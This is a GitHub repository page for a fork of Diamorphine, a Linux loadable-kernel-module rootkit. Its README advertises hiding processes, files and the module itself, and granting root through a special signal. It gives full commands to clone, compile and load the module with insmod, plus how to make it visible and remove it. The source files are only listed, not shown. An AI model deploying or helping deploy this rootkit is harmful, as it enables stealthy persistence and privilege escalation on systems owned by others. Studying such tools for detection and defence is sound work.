Skip to content
/ Diamorphine Public
forked from m0nad/Diamorphine

LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)

License

View license
0 stars 475 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

AITleo/Diamorphine

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

52 Commits
LICENSE.txt
LICENSE.txt
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
diamorphine.c
diamorphine.c
 
 
diamorphine.h
diamorphine.h
 
 

Repository files navigation

Diamorphine

Diamorphine is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)

Features

  • When loaded, the module starts invisible;

  • Hide/unhide any process by sending a signal 31;

  • Sending a signal 63(to any pid) makes the module become (in)visible;

  • Sending a signal 64(to any pid) makes the given user become root;

  • Files or directories starting with the MAGIC_PREFIX become invisible;

  • Source: https://github.com/m0nad/Diamorphine

Install

Verify if the kernel is 2.6.x/3.x/4.x/5.x

uname -r

Clone the repository

git clone https://github.com/m0nad/Diamorphine

Enter the folder

cd Diamorphine

Compile

make

When recieveing an error like (on ubuntu):

warning: the compiler differs from the one used to build the kernel
  The kernel was built by: x86_64-linux-gnu-gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0
  You are using:           gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0
  CC [M]  /home/ubuntu/Diamorphine/diamorphine.o
gcc: error: unrecognized command-line option ‘-ftrivial-auto-var-init=zero’

Set the standard gcc version to 12:

sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-11 11
sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-12 12
sudo update-alternatives --config gcc
(select gcc-12 here)

Load the module(as root)

insmod diamorphine.ko

Uninstall

The module starts invisible, to remove you need to make it visible

kill -63 0

Then remove the module(as root)

rmmod diamorphine

References

Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit

Linux Device Drivers http://lwn.net/Kernel/LDD3/

LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html

Memset's blog http://memset.wordpress.com/

Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html

WRITING A SIMPLE ROOTKIT FOR LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt

Linux Cross Reference http://lxr.free-electrons.com/

zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/

Linux Rootkits: New Methods for Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/

About

LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)

Resources

Readme

License

View license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C 98.7%
  • Makefile 1.3%